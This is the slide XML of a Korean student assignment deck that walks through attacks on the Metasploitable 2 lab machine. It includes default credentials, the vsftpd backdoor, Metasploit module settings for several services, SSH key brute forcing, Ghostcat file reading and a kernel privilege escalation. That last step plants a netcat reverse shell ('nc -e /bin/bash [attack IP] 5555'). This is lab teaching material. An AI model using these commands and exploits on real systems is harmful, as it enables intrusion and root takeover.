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40" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId18"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="283" r:id="rId2"/>
    <p:sldId id="363" r:id="rId3"/>
    <p:sldId id="364" r:id="rId4"/>
    <p:sldId id="301" r:id="rId5"/>
    <p:sldId id="365" r:id="rId6"/>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="288" r:id="rId8"/>
    <p:sldId id="289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</p:sldIdLst>
  <p:sldSz cx="130048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37" autoAdjust="0"/>
    <p:restoredTop sz="94665"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="13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567630" y="3394480"/>
            <a:ext cx="9869540" cy="2340864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4978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4875" y="6190285"/>
            <a:ext cx="7255053" cy="1763405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70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 algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2702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909B-09F8-4BD5-AF55-A665955BBD60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070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B1F-4A78-4DE2-B1E7-52FA32BE5580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11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9986" y="1332992"/>
            <a:ext cx="1498974" cy="708761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4155" y="1332992"/>
            <a:ext cx="6707447" cy="708761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B1F-4A78-4DE2-B1E7-52FA32BE5580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277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608121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B1F-4A78-4DE2-B1E7-52FA32BE5580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56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573581" y="3394480"/>
            <a:ext cx="9870643" cy="2340864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4978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4875" y="6190172"/>
            <a:ext cx="7255053" cy="1799228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702">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="650230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D96E-8D7E-422E-A2A8-D28C1B4E7B86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254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7630" y="3751885"/>
            <a:ext cx="4676299" cy="44117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0870" y="3751885"/>
            <a:ext cx="4679845" cy="441170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B1F-4A78-4DE2-B1E7-52FA32BE5580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67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7629" y="3290218"/>
            <a:ext cx="4676301" cy="1001368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702" b="0" cap="all" spc="142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650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="2702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7629" y="4470400"/>
            <a:ext cx="4676301" cy="36931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60870" y="4470400"/>
            <a:ext cx="4679845" cy="369319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760870" y="3290218"/>
            <a:ext cx="4679845" cy="1001368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702" b="0" cap="all" spc="142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650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="2702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B1F-4A78-4DE2-B1E7-52FA32BE5580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09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5670-3E6A-43D3-8215-C1C48E0C9650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69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4154-F461-49B9-A649-5772D9210BB9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76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502400" cy="97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11222" y="3191224"/>
            <a:ext cx="4679956" cy="1623462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987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5152" y="1144423"/>
            <a:ext cx="5136896" cy="7464755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2702">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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7328" y="5048772"/>
            <a:ext cx="4047744" cy="312040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133">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr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9B1F-4A78-4DE2-B1E7-52FA32BE5580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911222" y="8869274"/>
            <a:ext cx="5413544" cy="455168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9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" y="0"/>
            <a:ext cx="6502399" cy="97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10336" y="3191222"/>
            <a:ext cx="4681728" cy="16256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987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02401" y="-59978"/>
            <a:ext cx="6508904" cy="97536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4551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7328" y="5048774"/>
            <a:ext cx="4047744" cy="312040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133">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr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E842EE3-1862-478D-ABFA-CE4447D28533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910336" y="8869274"/>
            <a:ext cx="5409997" cy="455168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34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84154" y="1372006"/>
            <a:ext cx="8444807" cy="169062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4154" y="3751887"/>
            <a:ext cx="8444807" cy="4411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03385" y="8872983"/>
            <a:ext cx="2937330" cy="460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5E9B1F-4A78-4DE2-B1E7-52FA32BE5580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7629" y="8869274"/>
            <a:ext cx="6480589" cy="455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9270" y="8843264"/>
            <a:ext cx="520192" cy="520192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564" spc="0" baseline="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22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</p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="1300460" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3698" kern="1200" cap="all" spc="284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5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50230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75345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00460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625575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869411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6pPr>
      <a:lvl7pPr marL="2113247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7pPr>
      <a:lvl8pPr marL="2357083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00919" indent="-325115" algn="l" defTabSz="1300460" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1422"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2276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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#0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err="1"/>
              <a:t>nmap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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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3507D7-81DA-44C9-950C-7E70C6D3C5EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168521" y="1621689"/>
            <a:ext cx="8667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초기 설치 시 구동되는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open port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 중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distcc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ingreslock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제외하고는 아래와 같다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공격을 하기 앞서 이들이 잘 구동 되고 있는지 확인해볼 필요가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32762E2-D185-498D-AD1B-D4783BF17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875" y="2611854"/>
            <a:ext cx="763905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0495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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#6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ftp</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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286404A-A998-44D2-8EC3-B0D1E3718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030" y="1695022"/>
            <a:ext cx="6892739" cy="540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A9F74D-3DB5-4BB0-84B6-55406C8C752E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835897" y="7524206"/>
            <a:ext cx="93330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ftp [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targ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IP]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명령어 입력 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Name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“:)"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끝나는 이름을 쓰고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password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없이 연결 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우측 사진과 같이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telnet [target IP] 6200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명령어 입력 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root shell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딸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999861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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#7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java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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41F055-76BB-4096-B0BB-E7E82FD7342F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967891" y="7104185"/>
            <a:ext cx="50690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msfconsole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...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use exploit/multi/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misc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java_rmi_server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set target 2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set RHOST [target IP]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set PAYLOAD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linux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/x86/shell/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reverse_tcp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exploit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 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위의 그림과 같이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root shell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딸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9FD211-18DA-4F11-B017-1E1307DEC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030" y="1567622"/>
            <a:ext cx="6892739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0065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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#8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brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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107AA7E-50AF-4954-B6A2-F1DBECF577CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270038" y="1567622"/>
            <a:ext cx="1046472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https://www.exploit-db.com/exploits/5720 에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있는 코드와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주석에 링크되어 있는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key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다운 받은 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python 5720.py [key directory]/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rsa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/2048 [target IP] root 22 100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실행 시키면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다운 받은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key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brute force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진행한다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그리고 만약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brute force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성공했다면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root shell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딸 수 있는 실행 코드를 출력해주며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이를 그대로 실행 시키면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root shell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딸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C7B4BA-2150-49F7-8039-7F7E46553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835" y="3501435"/>
            <a:ext cx="989313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7362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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#9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권한 상승</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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AFB3C70-5857-41E3-8456-F1AE69AC3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179" y="1586672"/>
            <a:ext cx="9893130" cy="540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B02F15-A7B0-4AB9-B720-E51AA7B67DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764290" y="7318751"/>
            <a:ext cx="11476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msfadmin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계정 이외에도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user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postgres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등의 계정의 알 경우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다음의 방법으로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root shell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따낼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attack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machin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netcat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5555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port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liste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시켜 놓고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http://www.exploit-db.com/exploits/8572/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받은 코드를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victim machine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실행 시키면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root shell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따낼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691608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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#9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권한 상승</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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02F15-A7B0-4AB9-B720-E51AA7B67DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460521" y="2335357"/>
            <a:ext cx="12083757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victim machine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nc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깔려 있어야 한다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방법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attack machine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https://www.exploit-db.com/exploits/8572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코드를 다운 받은 후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,32bit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compile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시킨다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attack$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gcc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–m32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8572.c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–o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8572</a:t>
            </a:r>
          </a:p>
          <a:p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netcat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이용하여 만들어진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8572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실행파일을 넘긴다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attack$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nc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–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vv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–l –p 5555 &lt; 8572</a:t>
            </a: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victim$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nc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–v –n [attack IP] 5555 &gt; 8572</a:t>
            </a:r>
          </a:p>
          <a:p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victim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PID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확인한다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victim$ cat /proc/net/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netlink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여기서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아닌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PID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확인한 후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기억하고 있는다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8572.c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코드를 보면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tmp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/run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실행시키는 코드임을 알 수 있다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따라서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/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tmp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/run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nc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–e /bin/bash [attack IP] 5555’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넣어줘 실행되게 해준다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victim$ echo ‘#!/bin/bash’ &gt; /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tmp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/run</a:t>
            </a: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victim$ echo ‘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nc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–e /bin/bash [attack IP] 5555’ &gt;&gt; /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tmp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/run</a:t>
            </a:r>
          </a:p>
          <a:p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이제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attack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netcat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listen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열어두고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victim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8572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실행파일로 바꾼 후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실행시켜주면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root shell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딸 수 있게 된다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attack$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nc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–v –l –p 5555</a:t>
            </a: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victim$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chmod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+x 8572</a:t>
            </a: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victim$ ./8572 [PID]</a:t>
            </a:r>
          </a:p>
          <a:p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https://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/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887913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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#10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tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>획득</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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9B2A8E-4FA0-4427-A054-02B32FFAE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835" y="1695022"/>
            <a:ext cx="9893130" cy="540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206F98-EC5D-4649-A3E5-B902FCC58A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727695" y="7319914"/>
            <a:ext cx="95494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https://github.com/00theway/Ghostcat-CNVD-2020-10487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github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다운 받은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python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코드를 이용하면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tomcat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root path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파일을 읽을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여기서 중요한 것은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root path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밖의 파일들도 볼 수 있다는 것이다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이를 이용하여 최하위 디렉토리로 내려간 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/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etc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/tomcat5.5/tomcat-users.xml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읽으면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victim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machine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사용자가 아무리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tomcat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계정을 바꾸더라도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평문을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그대로 볼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552245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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#10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tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>획득</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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E70926-AD8D-45F9-A5AF-579ED5BBB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835" y="1317102"/>
            <a:ext cx="9893130" cy="540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21E1EF-FD6E-441D-9565-8933302147E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650751" y="6772598"/>
            <a:ext cx="97032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앞에서 얻은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tomcat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계정에 대한 정보와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msfconsole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exploit/multi/http/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tomcat_mgr_deploy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이용하면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손쉽게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tomcat shell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얻을 수 있다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use exploit/multi/http/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tomcat_mgr_deploy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set target 3</a:t>
            </a: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set PAYLOAD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linux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/x86/shell/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bind_tcp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set RPORT 8180</a:t>
            </a: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set RHOSTS [target IP]</a:t>
            </a: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set HTTPUSERNAME [tomcat name]</a:t>
            </a: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set HTTPPASSWORD [tomcat password]</a:t>
            </a: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exploit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947645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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#0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err="1"/>
              <a:t>nmap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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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D7C4C-1E97-4880-A933-DEF476A09CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581548" y="1681480"/>
            <a:ext cx="11841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이를 빠르고 편리하게 확인하기 위해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ip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마지막 번호를 입력하면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nmap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실행하여 앞선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port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들이 열려 있는지 확인하고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열려있지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않은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port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있다면 출력해주는 코드를 작성해보았다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E8FE42-2FBD-40E7-90FF-F9C62E773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986" y="2865653"/>
            <a:ext cx="9978826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5230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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#0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err="1"/>
              <a:t>nmap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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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D7C4C-1E97-4880-A933-DEF476A09CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581548" y="1681480"/>
            <a:ext cx="11841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이를 빠르고 편리하게 확인하기 위해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ip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마지막 번호를 입력하면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nmap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실행하여 앞선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port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들이 열려 있는지 확인하고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열려있지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않은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port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있다면 출력해주는 코드를 작성해보았다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E8FE42-2FBD-40E7-90FF-F9C62E773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986" y="2865653"/>
            <a:ext cx="9978826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5573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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#0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err="1"/>
              <a:t>nmap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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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D7C4C-1E97-4880-A933-DEF476A09CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285794" y="7508630"/>
            <a:ext cx="1243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위와 같이 만약 닫아 놓은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port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있을 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ip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마지막 번호를 인자로 넘겨 실행시키면 닫아 놓은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port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번호를 출력해준다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E39FF47-595D-434B-98C7-3CE45AE8C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987" y="1772779"/>
            <a:ext cx="9978826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2639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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#1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알려진 계정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로그인</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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3507D7-81DA-44C9-950C-7E70C6D3C5EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874520" y="2240280"/>
            <a:ext cx="868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아래와 같은 이미 알려진 계정의 이름과 비밀번호를 그대로 사용하고 있는지 확인해본다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688BC7B-BDD7-4D5C-8A9D-6AE92FD8222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67466" y="3642550"/>
          <a:ext cx="8669868" cy="3371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4934">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2135634222"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4334934">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1274797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Account 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Password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52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msfadmin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msfadmin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487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488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postgres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postgres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183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sys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batman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93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klog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123456789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54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service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service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700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11472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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#2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Web attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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5C3D75-94DF-411F-BAF8-4E0267ADD3AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679331" y="1567622"/>
            <a:ext cx="11646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다음과 같이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접속하거나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[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ip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]/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tikiwiki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같이 취약한 페이지에 접속했을 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취약한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web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페이지를 가지고 있을 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이들이 가지고 있는 취약점을 공격할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F7B5C23-3854-4344-A2CC-0F5E0BC72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3041018"/>
            <a:ext cx="5400000" cy="28968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CAD5C81-4733-4B74-8232-8260CB9F9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2300" y="3029414"/>
            <a:ext cx="5400000" cy="28968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B9148CF-B3EE-4A0D-9288-C952C717893A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435707" y="6487943"/>
            <a:ext cx="121333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접속했을 때는 취약한 페이지가 나타나지 않더라도 아래와 같은 페이지들에 직접 접속을 시도해 취약점을 찾아낼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test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tikiwiki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-old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dvwa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mutillidae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phpMyAdmin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tikiwiki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twiki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818368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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#3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err="1"/>
              <a:t>vnc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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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7840CD-4682-4C18-9B6B-A56551C0D0B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3321080" y="1968519"/>
            <a:ext cx="6362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VNC Viewer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VNC Server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접속을 시도할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초기 설정되어 있는 비밀번호는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password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618AE07-19BA-46F6-8263-A95FB7101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9997" y="3242529"/>
            <a:ext cx="8484806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5635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1" name="vsftp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공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#4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err="1"/>
              <a:t>samba_symlink_traversal</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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744" y="9399258"/>
            <a:ext cx="227312" cy="3429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6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1697D0-F036-423C-B49A-09D35D754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987" y="1567622"/>
            <a:ext cx="9978826" cy="5400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EEFB0B5-B72B-41EE-8ABE-5722BC9D1B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137544" y="6967061"/>
            <a:ext cx="65024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Msfconsole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에서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use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auxiliary/admin/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smb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samba_symlink_traversal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set RHOST [IP address]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set SMBSHARE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tmp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exploit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하면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metasploitable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tmp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폴더에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디렉토리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link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걸린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rootfs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link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파일이 생기며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Smbclient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접근할 수 있게 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126237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object 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-16358"/>
            <a:ext cx="13004801" cy="91982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1" name="vsftp"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="-348437"/>
            <a:ext cx="11099800" cy="1583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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#5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err="1"/>
              <a:t>irc</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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8744" y="9399258"/>
            <a:ext cx="227312" cy="3429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62" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50801" y="9357921"/>
            <a:ext cx="13301962" cy="419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892D174-5510-4B43-949F-B654CE9FA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987" y="1695022"/>
            <a:ext cx="9978826" cy="540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3B076D-7466-4974-B3C5-F4B4232F5BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460795" y="7383303"/>
            <a:ext cx="100832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irc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port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열려 있다면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msfconsole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다음과 같은 명령어 실행 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root shell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얻을 수 있게 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use exploit/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unix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irc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/unreal_ircd_3281_backdoor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set PAYLOAD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cmd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unix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bind_perl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set RHOSTS [IP]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 exploit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이후 비밀번호를 변경하면 로컬에서도 로그인이 가능한 것을 확인할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146494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{A971FE02-D10F-C34F-88F8-377DEADFB3FA}tf10001120</Template>
  <TotalTime>4811</TotalTime>
  <Words>1108</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>140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Helvetica Neue</vt:lpstr>
      <vt:lpstr>나눔고딕</vt:lpstr>
      <vt:lpstr>휴먼매직체</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>소포</vt:lpstr>
      <vt:lpstr>공격기법 #0 – nmap 확인</vt:lpstr>
      <vt:lpstr>공격기법 #0 – nmap 확인</vt:lpstr>
      <vt:lpstr>공격기법 #0 – nmap 확인</vt:lpstr>
      <vt:lpstr>공격기법 #0 – nmap 확인</vt:lpstr>
      <vt:lpstr>공격기법 #1 – 알려진 계정 로그인</vt:lpstr>
      <vt:lpstr>공격기법 #2 – Web attack</vt:lpstr>
      <vt:lpstr>공격기법 #3 – vnc server</vt:lpstr>
      <vt:lpstr>공격기법 #4 – samba_symlink_traversal</vt:lpstr>
      <vt:lpstr>공격기법 #5 – irc</vt:lpstr>
      <vt:lpstr>공격기법 #6 – ftp</vt:lpstr>
      <vt:lpstr>공격기법 #7 – java rmi attack</vt:lpstr>
      <vt:lpstr>공격기법 #8 – brute force ssh</vt:lpstr>
      <vt:lpstr>공격기법 #9 – 권한 상승</vt:lpstr>
      <vt:lpstr>공격기법 #9 – 권한 상승</vt:lpstr>
      <vt:lpstr>공격기법 #10 – tomcat shell 획득</vt:lpstr>
      <vt:lpstr>공격기법 #10 – tomcat shell 획득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기말과제</dc:title>
  <cp:lastModifiedBy>SAMSUNG</cp:lastModifiedBy>
  <cp:revision>196</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-17T05:29:34Z</dcterms:modified>
</cp:coreProperties>
</file>